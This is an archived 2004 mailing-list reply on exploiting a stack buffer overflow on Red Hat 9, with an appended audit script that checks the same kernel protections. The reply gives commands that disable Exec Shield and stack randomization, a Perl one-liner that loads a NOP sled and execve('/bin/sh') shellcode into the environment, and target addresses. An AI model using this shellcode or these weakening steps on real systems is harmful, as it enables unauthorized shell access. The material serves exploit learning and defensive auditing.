Vulnerability Development mailing list archives

Re: Buffer Overflow Help


From: runixd <runixd () nullcode net>
Date: Wed, 10 Nov 2004 16:08:43 +0000

On Wed, 2004-11-10 at 12:01 +0200, Harry de Grote wrote:
On Tuesday 09 November 2004 04:09, eip () tampabay rr com wrote:
<snip>
I am running GCC version 3.2.2 20030222 (Red Hat Linux 3.2.2-5) on a Redhat
9 box kernel 2.4.20-31.9. Am I doing something wrong?

no, you aren't

but... RH does randomize the stack a little iirc

so, my way of doing stuff then, is just brute force it! :)
(you could also return to libc or whatever)

How would returning to libc help with randomized stack?

Brute forcing should help, but while learning it's probably better to run a
vanilla kernel or disable Exec Shield. Depending on your version,
options may vary, but you should be able to disable stack randomization
by setting
/proc/sys/kernel/exec-shield-randomize to 0
"echo 0 > /proc/sys/kernel/exec-shield-randomize"

and you can disable exec shield in /proc/sys/kernel/exec-shield; setting
it to 0 should cause it to be disabled. Otherwise this is where you
have to work with a non-executable stack and return to libc.

You can start reading about Exec Shield at
http://people.redhat.com/mingo/exec-shield/ANNOUNCE-exec-shield

best way to do it (i think) is: put your shellcode in the env...

export SHELLCODE=`perl -e '{print "\x90"x65000 . 
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`

that should give you some breathing space for where to jump to...

shellcode starts (on my box) at 0xbfff0027, so everything from there to
0xbffffe00 should do fine...

regards


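The two /proc knobs named in the reply above, turned into a small audit script so you can confirm what a lab box is actually doing before blaming the compiler. This is an added example, not code from the thread or from Red Hat; the exec-shield and exec-shield-randomize paths are the ones quoted above, /proc/sys/kernel/randomize_va_space is assumed as the equivalent knob on mainline kernels, and the GNU_STACK check assumes binutils' readelf is installed. Every function takes the file or binary path as an argument so it can be pointed at constructed sample files.

```shell
#!/bin/sh
# Added example (not from the thread): report whether stack randomization and
# Exec Shield are active, and whether a given ELF asks for an executable stack.

# Print "enabled", "disabled" or "absent" for a 0/1-style sysctl file.
# Any non-zero value (randomize_va_space uses 0/1/2) counts as enabled.
sysctl_state() {
    path="$1"
    if [ ! -r "$path" ]; then
        echo absent
        return 0
    fi
    val=$(tr -d '[:space:]' < "$path")
    case "$val" in
        0) echo disabled ;;
        *) echo enabled ;;
    esac
}

# Combine the three knobs into one verdict:
#   "lab"      - no randomization / NX knob is on (what the reply suggests
#                for learning, and what you should never see on a production box)
#   "hardened" - at least one of them is on
#   "unknown"  - none of the files exist, so this kernel has different knobs
protection_verdict() {
    es=$(sysctl_state "$1")      # /proc/sys/kernel/exec-shield
    esr=$(sysctl_state "$2")     # /proc/sys/kernel/exec-shield-randomize
    rvs=$(sysctl_state "$3")     # /proc/sys/kernel/randomize_va_space (assumed)
    if [ "$es" = absent ] && [ "$esr" = absent ] && [ "$rvs" = absent ]; then
        echo unknown
    elif [ "$es" != enabled ] && [ "$esr" != enabled ] && [ "$rvs" != enabled ]; then
        echo lab
    else
        echo hardened
    fi
}

# Print "exec" if the binary's PT_GNU_STACK header carries the E flag,
# "noexec" if it is present without E, "nostack" if the header is missing
# (old toolchains; the kernel then falls back to an executable stack),
# or "unavailable" if readelf is not installed.
stack_flag() {
    command -v readelf >/dev/null 2>&1 || { echo unavailable; return 0; }
    readelf -lW "$1" 2>/dev/null | awk '
        /GNU_STACK/ { found = 1; if ($7 ~ /E/) print "exec"; else print "noexec"; exit }
        END { if (!found) print "nostack" }'
}

# Live report for the machine this runs on.
audit_report() {
    echo "exec-shield:            $(sysctl_state /proc/sys/kernel/exec-shield)"
    echo "exec-shield-randomize:  $(sysctl_state /proc/sys/kernel/exec-shield-randomize)"
    echo "randomize_va_space:     $(sysctl_state /proc/sys/kernel/randomize_va_space)"
    echo "verdict:                $(protection_verdict /proc/sys/kernel/exec-shield \
        /proc/sys/kernel/exec-shield-randomize /proc/sys/kernel/randomize_va_space)"
    [ $# -ge 1 ] && echo "GNU_STACK of $1:        $(stack_flag "$1")"
    return 0
}

audit_report "$@"
```

Run it as `sh audit.sh ./vuln` to see both the kernel knobs and whether the test program was linked with an executable stack; a "hardened" verdict or a "noexec" flag explains a crash on return just as well as a mistyped address does.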